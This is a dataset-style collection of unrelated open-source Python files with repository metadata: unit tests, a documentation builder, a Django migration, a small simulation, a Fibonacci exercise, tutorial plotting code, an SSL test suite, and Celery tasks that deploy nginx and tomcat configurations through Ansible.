config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') config_db.HealthMonitorSM.delete('test-hm') # end test_add_delete_pool_with_members_vip_hm def test_add_delete_multiple_pools(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) pool.add() vip_1 = self.create_vip('vip_1', project) pool_1 = self.create_pool("test-lb-pool_1", "default-domain:admin:test-lb-pool_1", project, vip_1) pool_1.add() self.assertEqual(len(self._db), 2) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list), 1) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list['tenant']), 2) self.assertEqual(self.lb_agent._loadbalancer_driver['f5'].project_list['tenant'], set(['test-lb-pool', 'test-lb-pool_1'])) # Cleanup config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') self.assertFalse(self._mock_BigIp.return_value.system.delete_folder.called) self.assertEqual(len(self._db), 1) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list), 1) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list['tenant']), 1) self.assertEqual(self.lb_agent._loadbalancer_driver['f5'].project_list['tenant'], set(['test-lb-pool_1'])) # Cleanup config_db.LoadbalancerPoolSM.delete('test-lb-pool_1') config_db.VirtualIpSM.delete('vip_1') self.assertTrue(self._mock_BigIp.return_value.system.delete_folder.called) self.assertEqual(len(self._db), 0) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list), 0) # end test_add_delete_multiple_pools #end F5LBTest(unittest.TestCase):
42,768
13
777
c50ba6b8e1ade4d4df84686b6b1fc92c6b818a1b
2,307
py
Python
vendor-local/src/python-nose/scripts/mkindex.py
mozilla/sheriffs
9e3a837e0115252e01c9bcd5c9d56d11af760875
[ "BSD-3-Clause" ]
null
null
null
vendor-local/src/python-nose/scripts/mkindex.py
mozilla/sheriffs
9e3a837e0115252e01c9bcd5c9d56d11af760875
[ "BSD-3-Clause" ]
null
null
null
vendor-local/src/python-nose/scripts/mkindex.py
mozilla/sheriffs
9e3a837e0115252e01c9bcd5c9d56d11af760875
[ "BSD-3-Clause" ]
1
2019-11-02T23:29:13.000Z
2019-11-02T23:29:13.000Z
#!/usr/bin/env python from docutils.core import publish_string, publish_parts from docutils.readers.standalone import Reader from nose.config import Config from nose.plugins.manager import BuiltinPluginManager import nose import nose.commands import nose.tools import os import re import time doc_word.priority = 100 root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) print "Main..." tpl = open(os.path.join(root, 'index.html.tpl'), 'r').read() pat = re.compile(r'^.*(Basic usage)', re.DOTALL) txt = nose.__doc__.replace(':: python','::') txt = pat.sub(r'\1', txt) # cut from 'about the name' down (goes to end of page) pat = re.compile(r'^(.*?)(About the name.*$)', re.DOTALL) txt, coda = pat.search(txt).groups() docs = publish_parts(txt, reader=DocReader(), writer_name='html') docs.update({'version': nose.__version__, 'date': time.ctime()}) docs['coda'] = publish_parts(coda, writer_name='html')['body'] #print "Tools..." #tools = publish_parts(nose.tools.__doc__, writer_name='html') #docs['tools'] = tools['body'] print "Commands..." cmds = publish_parts(nose.commands.__doc__, reader=DocReader(), writer_name='html') docs['commands'] = cmds['body'] print "Changelog..." changes = open(os.path.join(root, 'CHANGELOG'), 'r').read() changes_html = publish_parts(changes, reader=DocReader(), writer_name='html') docs['changelog'] = changes_html['body'] print "News..." news = open(os.path.join(root, 'NEWS'), 'r').read() news_html = publish_parts(news, reader=DocReader(), writer_name='html') docs['news'] = news_html['body'] print "Usage..." conf = Config(plugins=BuiltinPluginManager()) usage_txt = conf.help(nose.main.__doc__).replace( 'mkindex.py', 'nosetests') docs['usage'] = '<pre>%s</pre>' % usage_txt out = tpl % docs index = open(os.path.join(root, 'index.html'), 'w') index.write(out) index.close() readme = open(os.path.join(root, 'README.txt'), 'w') readme.write(nose.__doc__) readme.close()
28.8375
77
0.674902
#!/usr/bin/env python from docutils.core import publish_string, publish_parts from docutils.readers.standalone import Reader from nose.config import Config from nose.plugins.manager import BuiltinPluginManager import nose import nose.commands import nose.tools import os import re import time def doc_word(node): print "Unknown ref %s" % node.astext() node['refuri'] = 'doc/' \ + '_'.join(map(lambda s: s.lower(), node.astext().split(' '))) \ + '.html' del node['refname'] node.resolved = True return True doc_word.priority = 100 class DocReader(Reader): unknown_reference_resolvers = (doc_word,) root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) print "Main..." tpl = open(os.path.join(root, 'index.html.tpl'), 'r').read() pat = re.compile(r'^.*(Basic usage)', re.DOTALL) txt = nose.__doc__.replace(':: python','::') txt = pat.sub(r'\1', txt) # cut from 'about the name' down (goes to end of page) pat = re.compile(r'^(.*?)(About the name.*$)', re.DOTALL) txt, coda = pat.search(txt).groups() docs = publish_parts(txt, reader=DocReader(), writer_name='html') docs.update({'version': nose.__version__, 'date': time.ctime()}) docs['coda'] = publish_parts(coda, writer_name='html')['body'] #print "Tools..." #tools = publish_parts(nose.tools.__doc__, writer_name='html') #docs['tools'] = tools['body'] print "Commands..." cmds = publish_parts(nose.commands.__doc__, reader=DocReader(), writer_name='html') docs['commands'] = cmds['body'] print "Changelog..." changes = open(os.path.join(root, 'CHANGELOG'), 'r').read() changes_html = publish_parts(changes, reader=DocReader(), writer_name='html') docs['changelog'] = changes_html['body'] print "News..." news = open(os.path.join(root, 'NEWS'), 'r').read() news_html = publish_parts(news, reader=DocReader(), writer_name='html') docs['news'] = news_html['body'] print "Usage..." conf = Config(plugins=BuiltinPluginManager()) usage_txt = conf.help(nose.main.__doc__).replace( 'mkindex.py', 'nosetests') docs['usage'] = '<pre>%s</pre>' % usage_txt out = tpl % docs index = open(os.path.join(root, 'index.html'), 'w') index.write(out) index.close() readme = open(os.path.join(root, 'README.txt'), 'w') readme.write(nose.__doc__) readme.close()
231
49
46
270ee543b329ffc1200cf23a84edbb417e93fe3f
722
py
Python
biserici_inlemnite/app/migrations/0012_descrierepage_gabarit_exterior_al_talpilor.py
ck-tm/biserici-inlemnite
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
[ "MIT" ]
null
null
null
biserici_inlemnite/app/migrations/0012_descrierepage_gabarit_exterior_al_talpilor.py
ck-tm/biserici-inlemnite
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
[ "MIT" ]
null
null
null
biserici_inlemnite/app/migrations/0012_descrierepage_gabarit_exterior_al_talpilor.py
ck-tm/biserici-inlemnite
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
[ "MIT" ]
null
null
null
# Generated by Django 3.1.13 on 2021-09-21 15:33 from django.db import migrations, models import django.db.models.deletion
34.380952
240
0.695291
# Generated by Django 3.1.13 on 2021-09-21 15:33 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('wagtailimages', '0023_add_choose_permissions'), ('app', '0011_remove_descrierepage_gabarit_exterior_al_talpilor'), ] operations = [ migrations.AddField( model_name='descrierepage', name='gabarit_exterior_al_talpilor', field=models.ForeignKey(blank=True, help_text='o schiță a planului tălpilor / elevației / turnului / triunghiului șarpantei', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image'), ), ]
0
579
23
4e2e7c10c7e9a5d0b6ea8f2706b2f2759257445a
2,047
py
Python
examples/collectibles_simple.py
TheoLvs/westworld
7fb435f3a028ff3d3156bf2a023b44ee06aa9f8b
[ "MIT" ]
null
null
null
examples/collectibles_simple.py
TheoLvs/westworld
7fb435f3a028ff3d3156bf2a023b44ee06aa9f8b
[ "MIT" ]
3
2021-09-06T23:12:23.000Z
2021-09-17T01:04:34.000Z
examples/collectibles_simple.py
TheoLvs/westworld
7fb435f3a028ff3d3156bf2a023b44ee06aa9f8b
[ "MIT" ]
null
null
null
"""Simulation where an agent will get all collectibles spawn randomly """ import sys sys.path.append("../") from westworld.environment import GridEnvironment from westworld.agents import BaseGridAgent from westworld.objects import BaseObstacle,BaseTrigger,BaseCollectible from westworld.simulation import Simulation from westworld.colors import * #================================================================================================== # BASE CLASSES #================================================================================================== #================================================================================================== # SIMULATION #================================================================================================== # Setup agents agent = Agent(1,1,color = RED) # Setup collectibles as random spawner collectible_spawner = lambda x,y : Collectible(x,y,color = WHITE) # Setup environment env = GridEnvironment(20,10,30,objects = [agent]) env.spawn(collectible_spawner,10) env.render() # Prepare simulation sim = Simulation(env,fps = 30,name="CollectiblesSimple") if __name__ == "__main__": sim.run_episode(n_steps = 200,save = True)
26.934211
99
0.50171
"""Simulation where an agent will get all collectibles spawn randomly """ import sys sys.path.append("../") from westworld.environment import GridEnvironment from westworld.agents import BaseGridAgent from westworld.objects import BaseObstacle,BaseTrigger,BaseCollectible from westworld.simulation import Simulation from westworld.colors import * #================================================================================================== # BASE CLASSES #================================================================================================== class Agent(BaseGridAgent): def init(self): self.score = 0 self.target = None def step(self): # Safety check if self.target is not None: if self.target not in self.env._objects: self.target = None # Find next target if self.target is None: _,ids = self.find_closest(k = 1,condition = {"collectible":True}) if len(ids) == 0: self.env.finish_episode() else: stop = False self.target = ids[0] if not self.env.done: self.move_towards(obj = self.target,n = 10) class Collectible(BaseCollectible): def on_trigger(self,obj): obj.score += 1 obj.target = None #================================================================================================== # SIMULATION #================================================================================================== # Setup agents agent = Agent(1,1,color = RED) # Setup collectibles as random spawner collectible_spawner = lambda x,y : Collectible(x,y,color = WHITE) # Setup environment env = GridEnvironment(20,10,30,objects = [agent]) env.spawn(collectible_spawner,10) env.render() # Prepare simulation sim = Simulation(env,fps = 30,name="CollectiblesSimple") if __name__ == "__main__": sim.run_episode(n_steps = 200,save = True)
636
20
147
91da93d1a3454065294d6224dce2fef0ad33aa04
1,053
py
Python
gmit--exercise04--problem02--fibonacci-even-values-under-4million--code--20180224.py
g00364787/52167assessments
65318102196fbbf40b764cd189edc4e31963ecf5
[ "Apache-2.0" ]
null
null
null
gmit--exercise04--problem02--fibonacci-even-values-under-4million--code--20180224.py
g00364787/52167assessments
65318102196fbbf40b764cd189edc4e31963ecf5
[ "Apache-2.0" ]
null
null
null
gmit--exercise04--problem02--fibonacci-even-values-under-4million--code--20180224.py
g00364787/52167assessments
65318102196fbbf40b764cd189edc4e31963ecf5
[ "Apache-2.0" ]
null
null
null
# AUTHOR = PAUL KEARNEY # STUDENT ID = G00364787 # DATE = 2018-02-24 # # STUDENT ID = G00364787 # EXERCISE 04 # projectEuler problem 2 # references used # http://www.tutorialspoint.com/python/python_basic_operators.htm # https://www.tutorialspoint.com/python/python_strings.htm # https://stackoverflow.com/questions/9120059/odd-even-string-python # # function to calculate the FIBONACCI value for input value n def fib(n): """This function returns the nth Fibonacci number.""" i = 0 j = 1 n = n - 1 while n >= 0: i, j = j, i + j n = n - 1 return i # setup working storage num = 0 total = 0 result = 0 total = 0 ok = 1 opStr = "" # main routine while result < 4000000 and ok == 1: result = fib(num) if (result < 4000000): if (result %2 == 0 ): total = total+result else: ok = 0 num = num + 1 # program output to screen opStr = "The sum of the even numbers 'under' 4 million is "+ str(total) print(opStr)
21.06
73
0.595442
# AUTHOR = PAUL KEARNEY # STUDENT ID = G00364787 # DATE = 2018-02-24 # # STUDENT ID = G00364787 # EXERCISE 04 # projectEuler problem 2 # references used # http://www.tutorialspoint.com/python/python_basic_operators.htm # https://www.tutorialspoint.com/python/python_strings.htm # https://stackoverflow.com/questions/9120059/odd-even-string-python # # function to calculate the FIBONACCI value for input value n def fib(n): """This function returns the nth Fibonacci number.""" i = 0 j = 1 n = n - 1 while n >= 0: i, j = j, i + j n = n - 1 return i # setup working storage num = 0 total = 0 result = 0 total = 0 ok = 1 opStr = "" # main routine while result < 4000000 and ok == 1: result = fib(num) if (result < 4000000): if (result %2 == 0 ): total = total+result else: ok = 0 num = num + 1 # program output to screen opStr = "The sum of the even numbers 'under' 4 million is "+ str(total) print(opStr)
0
0
0
16c23eeac2b96f412b198365c9cccb8c69ca1254
2,567
py
Python
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_fba5d745.py
liuxiaomiao123/NeuroMathAcademy
16a7969604a300bf9fbb86f8a5b26050ebd14c65
[ "CC-BY-4.0" ]
2
2020-07-03T04:39:09.000Z
2020-07-12T02:08:31.000Z
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_fba5d745.py
NinaHKivanani/course-content
3c91dd1a669cebce892486ba4f8086b1ef2e1e49
[ "CC-BY-4.0" ]
1
2020-06-22T22:57:03.000Z
2020-06-22T22:57:03.000Z
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_fba5d745.py
NinaHKivanani/course-content
3c91dd1a669cebce892486ba4f8086b1ef2e1e49
[ "CC-BY-4.0" ]
1
2021-03-29T21:08:26.000Z
2021-03-29T21:08:26.000Z
def plot_tuning_curve(resp, ori, ax=None): """Plot single neuron responses as a function of stimulus orientation Args: resp (numpy array): n_stimuli x n_neurons matrix with responses of each neuron whose tuning curve to plot. Can also be a 1D array of length n_stimuli to plot tuning curve of a single neuron. ori (numpy array): 1D array of length stimuli with orientations of each stimulus, in radians ax (matplotlib axes): axes onto which to plot """ if ax is None: ax = plt.gca() ax.plot(np.rad2deg(ori), resp, '.-') ax.set_xticks(np.linspace(-90, 90, 5)) ax.set_xlabel('stimulus orientation') ax.set_ylabel('neuron response') def plot_dim_reduction(resp, ori, ax=None): """Plot dimensionality-reduced population responses (using tSNE) Args: resp (numpy array): n_stimuli x n_neurons matrix with population responses ori (numpy array): 1D array of length stimuli with orientations of each stimulus, in radians ax (matplotlib axes): axes onto which to plot """ if ax is None: ax = plt.gca() # First do PCA to reduce dimensionality to 200 dimensions so that tSNE is faster resp_lowd = PCA(n_components=min(200, resp.shape[1])).fit_transform(resp) # Then do tSNE to reduce dimensionality to 2 dimensions resp_lowd = TSNE(n_components=2).fit_transform(resp_lowd) # Plot dimensionality-reduced population responses # on 2D axes, with each point colored by stimulus orientation scat = ax.scatter(resp_lowd[:, 0], resp_lowd[:, 1], c=np.rad2deg(ori), cmap='twilight') cbar = plt.colorbar(scat, ax=ax, label='stimulus orientation') ax.set_xlabel('dimension 1') ax.set_ylabel('dimension 2') ax.set_xticks([]) ax.set_yticks([]) # Aggregate all responses into one dict resp_dict = {} resp_dict['V1 data'] = resp_v1 for k, v in resp_model.items(): label = 'model\nlayer %s' % k resp_dict[label] = v # Plot tuning curves and dimensionality-reduced responses next to each other with plt.xkcd(): figsize = 4 fig, axs = plt.subplots(2, len(resp_dict), figsize=(len(resp_dict) * figsize, 2 * figsize)) for i, (label, resp) in enumerate(resp_dict.items()): axs[0, i].set_title('%s responses' % label) # Plot tuning curves of three random neurons ineurons = np.random.choice(resp.shape[1], 3, replace=False) # indices of three random neurons plot_tuning_curve(resp[:, ineurons], ori, axs[0, i]) # Plot dimensionality-reduced population responses plot_dim_reduction(resp, ori, axs[1, i]) plt.tight_layout() plt.show()
34.226667
99
0.706272
def plot_tuning_curve(resp, ori, ax=None): """Plot single neuron responses as a function of stimulus orientation Args: resp (numpy array): n_stimuli x n_neurons matrix with responses of each neuron whose tuning curve to plot. Can also be a 1D array of length n_stimuli to plot tuning curve of a single neuron. ori (numpy array): 1D array of length stimuli with orientations of each stimulus, in radians ax (matplotlib axes): axes onto which to plot """ if ax is None: ax = plt.gca() ax.plot(np.rad2deg(ori), resp, '.-') ax.set_xticks(np.linspace(-90, 90, 5)) ax.set_xlabel('stimulus orientation') ax.set_ylabel('neuron response') def plot_dim_reduction(resp, ori, ax=None): """Plot dimensionality-reduced population responses (using tSNE) Args: resp (numpy array): n_stimuli x n_neurons matrix with population responses ori (numpy array): 1D array of length stimuli with orientations of each stimulus, in radians ax (matplotlib axes): axes onto which to plot """ if ax is None: ax = plt.gca() # First do PCA to reduce dimensionality to 200 dimensions so that tSNE is faster resp_lowd = PCA(n_components=min(200, resp.shape[1])).fit_transform(resp) # Then do tSNE to reduce dimensionality to 2 dimensions resp_lowd = TSNE(n_components=2).fit_transform(resp_lowd) # Plot dimensionality-reduced population responses # on 2D axes, with each point colored by stimulus orientation scat = ax.scatter(resp_lowd[:, 0], resp_lowd[:, 1], c=np.rad2deg(ori), cmap='twilight') cbar = plt.colorbar(scat, ax=ax, label='stimulus orientation') ax.set_xlabel('dimension 1') ax.set_ylabel('dimension 2') ax.set_xticks([]) ax.set_yticks([]) # Aggregate all responses into one dict resp_dict = {} resp_dict['V1 data'] = resp_v1 for k, v in resp_model.items(): label = 'model\nlayer %s' % k resp_dict[label] = v # Plot tuning curves and dimensionality-reduced responses next to each other with plt.xkcd(): figsize = 4 fig, axs = plt.subplots(2, len(resp_dict), figsize=(len(resp_dict) * figsize, 2 * figsize)) for i, (label, resp) in enumerate(resp_dict.items()): axs[0, i].set_title('%s responses' % label) # Plot tuning curves of three random neurons ineurons = np.random.choice(resp.shape[1], 3, replace=False) # indices of three random neurons plot_tuning_curve(resp[:, ineurons], ori, axs[0, i]) # Plot dimensionality-reduced population responses plot_dim_reduction(resp, ori, axs[1, i]) plt.tight_layout() plt.show()
0
0
0
048379005b2b62f1b01faadba6f978d4f3ede30a
3,116
py
Python
tst/inet/ssl/ssl_suite.py
ivankravets/pumbaa
2a1869cc204e3128516ed6fa9f89529aedec1702
[ "MIT" ]
69
2016-09-04T18:36:18.000Z
2021-07-04T21:51:54.000Z
tst/inet/ssl/ssl_suite.py
ivankravets/pumbaa
2a1869cc204e3128516ed6fa9f89529aedec1702
[ "MIT" ]
42
2016-09-02T20:10:19.000Z
2020-07-01T05:54:01.000Z
tst/inet/ssl/ssl_suite.py
ivankravets/pumbaa
2a1869cc204e3128516ed6fa9f89529aedec1702
[ "MIT" ]
11
2016-09-29T14:33:23.000Z
2021-02-28T19:30:49.000Z
# # @section License # # The MIT License (MIT) # # Copyright (c) 2016-2017, Erik Moqvist # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, copy, # modify, merge, publish, distribute, sublicense, and/or sell copies # of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # This file is part of the Pumbaa project. # import harness from harness import assert_raises import ssl import socket import socket_stub TESTCASES = [ (test_print, "test_print"), (test_client, "test_client"), (test_server, "test_server") ]
30.252427
69
0.675225
# # @section License # # The MIT License (MIT) # # Copyright (c) 2016-2017, Erik Moqvist # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, copy, # modify, merge, publish, distribute, sublicense, and/or sell copies # of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # This file is part of the Pumbaa project. # import harness from harness import assert_raises import ssl import socket import socket_stub def test_print(): help(ssl) print(ssl) context = ssl.SSLContext(ssl.PROTOCOL_TLS) print(context) help(context) server_sock = socket.socket() ssl_server_sock = context.wrap_socket(server_sock) print(ssl_server_sock) help(ssl_server_sock) def test_client(): with open('server.crt', 'w') as f: f.write('foo') context = ssl.SSLContext(ssl.PROTOCOL_TLS) context.load_verify_locations(cafile="server.crt") context.set_verify_mode(ssl.CERT_REQUIRED) sock = socket.socket() sock.connect(('192.168.0.1', 8080)) ssl_sock = context.wrap_socket(sock) assert ssl_sock.get_server_hostname() == 'test_server' assert ssl_sock.cipher() == ('TLS-RSA-WITH-AES-256-GCM-SHA384', 'TLSv1.1', -1) assert ssl_sock.send(b'hello') == 5 assert ssl_sock.recv(7) == b'goodbye' def test_server(): with open('server.crt', 'w') as f: f.write('bar') with open('server.key', 'w') as f: f.write('fie') socket_stub.set_accept(0) context = ssl.SSLContext(ssl.PROTOCOL_TLS) context.load_cert_chain("server.crt", keyfile="server.key") listener_sock = socket.socket() listener_sock.bind(('192.168.0.1', 8080)) listener_sock.listen(5) sock, _ = listener_sock.accept() ssl_sock = context.wrap_socket(sock, server_side=True) assert ssl_sock.get_server_hostname() is None assert ssl_sock.cipher() == ('TLS-RSA-WITH-AES-256-GCM-SHA384', 'TLSv1.1', -1) assert ssl_sock.recv(5) == b'hello' assert ssl_sock.send(b'goodbye') == 7 TESTCASES = [ (test_print, "test_print"), (test_client, "test_client"), (test_server, "test_server") ]
1,636
0
69
34408d0df213d02bbeba41e708fedfed3c63febc
9,443
py
Python
xbmanIntegrated/SCMS/tasks.py
suntao789/Aclsm
2202201c8279391386a4569e69f93d90eca5b96a
[ "Apache-2.0" ]
38
2018-01-17T03:32:25.000Z
2021-03-05T03:10:13.000Z
xbmanIntegrated/SCMS/tasks.py
suntao789/Aclsm
2202201c8279391386a4569e69f93d90eca5b96a
[ "Apache-2.0" ]
null
null
null
xbmanIntegrated/SCMS/tasks.py
suntao789/Aclsm
2202201c8279391386a4569e69f93d90eca5b96a
[ "Apache-2.0" ]
17
2018-05-29T06:50:10.000Z
2021-07-08T01:47:22.000Z
#!/usr/bin/env python #-*- coding:utf-8 -*- __author__ = 'weihaoxuan' from celery import task from confile_process import process import models import os # import ansible_api @task @task @task @task @task @task @task @task @task
43.92093
122
0.595785
#!/usr/bin/env python #-*- coding:utf-8 -*- __author__ = 'weihaoxuan' from celery import task from confile_process import process import models import os # import ansible_api @task def nginxdev_push(file,pclist,puthdir): iplist = [] log = [] confname, path = process().nginx_conf(id=file) for i in pclist: item = models.device_config.objects.get(id=i) iplist.append(item.ipaddress) obj = models.task(task_name='nginx推送',config_name=confname, task_Operated=','.join(iplist),task_result=3) obj.save() obj_id = obj.id if len(puthdir.strip()) == 0: module_args = 'src=%s dest=/tmp/nginx.conf'%path else: module_args = 'src=%s dest=/%s/nginx.conf' %(path,puthdir.strip().strip('/')) date = ansible_api.MyRunner().cmdrun(pattern=','.join(iplist),module_name='copy', module_args=module_args)['contacted'] task_result = 1 for i in iplist: try: log.append(i + ':') log.append(str(date[i]['changed']) + '\n') except Exception,e: log.append(str(date[i]['msg']) + '\n') task_result = 2 continue models.task.objects.filter(id=obj_id).update(task_result=task_result,task_log='\n'.join(log)) @task def nginxgroup_push(group,file): log = [] item = models.group_config.objects.get(id=group) confname,path = process().nginx_conf(id=file) obj = models.task(task_name='nginx组推送',config_name=confname, task_Operated=item.group_name,task_result=3) obj.save() obj_id = obj.id if len(item.nginx_puth.strip()) == 0: module_args = 'src=%s dest=/tmp/nginx.conf' % path else: module_args = 'src=%s dest=/%s/nginx.conf' % (path, item.nginx_puth.strip().strip('/')) try: for i in models.device_config.objects.filter(group=group): date = ansible_api.MyRunner().cmdrun(pattern=i.ipaddress,module_name='copy', module_args=module_args)['contacted'] log.append(i.ipaddress + ':') log.append(str(date[i.ipaddress]['changed']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1,task_log='\n'.join(log)) except Exception,e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def tomcatdev_push(file,pclist,puthdir): ipdict = {} log = [] confname,path = process().tomcat_conf(id=file) for i in pclist: item = models.device_config.objects.get(id=i) ipdict[item.ipaddress] = item.password obj = models.task(task_name='tomcat推送', config_name=confname, task_Operated=','.join(ipdict.keys()), task_result=3) obj.save() obj_id = obj.id if len(puthdir.strip()) == 0: module_args = 'src=%s dest=/tmp/server.xml' % path else: module_args = 'src=%s dest=/%s/server.xml' % (path,puthdir.strip().strip('/')) try: for k, y in ipdict.items(): date = ansible_api.MyRunner().cmdrun(pattern=k, module_name='copy', module_args=module_args)[ 'contacted'] log.append(k + ':') log.append(str(date[k]['changed']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception,e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def tomcatgroup_push(group,file): log = [] item = models.group_config.objects.get(id=group) confname, path = process().tomcat_conf(id=file) obj = models.task(task_name='tomcat组推送', config_name=confname, task_Operated=item.group_name, task_result=3) obj.save() obj_id = obj.id if len(item.tomcat_puth.strip()) == 0: module_args = 'src=%s dest=/tmp/server.xml' % path else: module_args = 'src=%s dest=/%s/server.xml' % (path, item.tomcat_puth.strip().strip('/')) try: for i in models.device_config.objects.filter(group=group): date = ansible_api.MyRunner().cmdrun(pattern=i.ipaddress, module_name='copy', module_args=module_args)[ 'contacted'] log.append(i.ipaddress + ':') log.append(str(date[i.ipaddress]['changed']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception,e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def ninstall_push(pclist,id): ipdict = {} log = [] confname, path = process().nginxinstall_conf(id=id) for i in pclist: item = models.device_config.objects.get(id=i) ipdict[item.ipaddress] = item.password obj = models.task(task_name='nginx安装', config_name=confname, task_Operated=','.join(ipdict.keys()), task_result=3) obj.save() obj_id = obj.id try: for k, y in ipdict.items(): date = ansible_api.MyRunner().PlayBook_execute(play=path,params='{"host": "%s"}'%k) log.append(k + ':') log.append(str(date[k]['failures']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def ninstallgroup_push(group_id,id): log = [] item = models.group_config.objects.get(id=group_id) confname, path = process().nginxinstall_conf(id=id) obj = models.task(task_name='nginx组安装', config_name=confname, task_Operated=item.group_name, task_result=3) obj.save() obj_id = obj.id try: for i in models.device_config.objects.filter(group=group_id): date = ansible_api.MyRunner().PlayBook_execute(play=path,params='{"host": "%s"}'%i.ipaddress) log.append(i.ipaddress + ':') log.append(str(date[i.ipaddress]['failures']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def tinstall_push(pclist,id): ipdict = {} log = [] confname, path = process().tomcatinstall_conf(id=id) for i in pclist: item = models.device_config.objects.get(id=i) ipdict[item.ipaddress] = item.password obj = models.task(task_name='tomcat安装', config_name=confname, task_Operated=','.join(ipdict.keys()), task_result=3) obj.save() obj_id = obj.id try: for k, y in ipdict.items(): date = ansible_api.MyRunner().PlayBook_execute(play=path, params='{"host": "%s"}' % k) log.append(k + ':') log.append(str(date[k]['failures']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def tinstallgroup_push(group_id,id): log = [] item = models.group_config.objects.get(id=group_id) confname, path = process().tomcatinstall_conf(id=id) obj = models.task(task_name='tomcat组安装', config_name=confname, task_Operated=item.group_name, task_result=3) obj.save() obj_id = obj.id try: for i in models.device_config.objects.filter(group=group_id): date = ansible_api.MyRunner().PlayBook_execute(play=path,params='{"host": "%s"}' % i.ipaddress) log.append(i.ipaddress + ':') log.append(str(date[i.ipaddress]['failures']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def playbook(p_id,p_name,inventory=None): basedir = models.Playbook.objects.get(id=p_id) path = os.path.join(basedir.basedir.split('.')[0], p_name) obj = models.task(task_name='playbook执行', config_name='不涉及', task_Operated='不涉及', task_result=3) obj.save() obj_id = obj.id try: if inventory: date = ansible_api.MyRunner().roles_execute(play=path, inventory=os.path.join(basedir.basedir.split('.')[0],'inventory')) else: date = ansible_api.MyRunner().roles_execute(play=path) models.task.objects.filter(id=obj_id).update(task_result=1, task_log=date) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!')
9,317
0
198
1d057d22f7e979ae15ce1bdc1772f344ee6c4a54
9,204
py
Python
readthedocs/builds/querysets.py
shazelquist/readthedocs.org
25c0f5d9528bd92db3c62db91e8eed8032d01b01
[ "MIT" ]
null
null
null
readthedocs/builds/querysets.py
shazelquist/readthedocs.org
25c0f5d9528bd92db3c62db91e8eed8032d01b01
[ "MIT" ]
1
2022-03-02T11:55:37.000Z
2022-03-02T11:55:37.000Z
readthedocs/builds/querysets.py
shazelquist/readthedocs.org
25c0f5d9528bd92db3c62db91e8eed8032d01b01
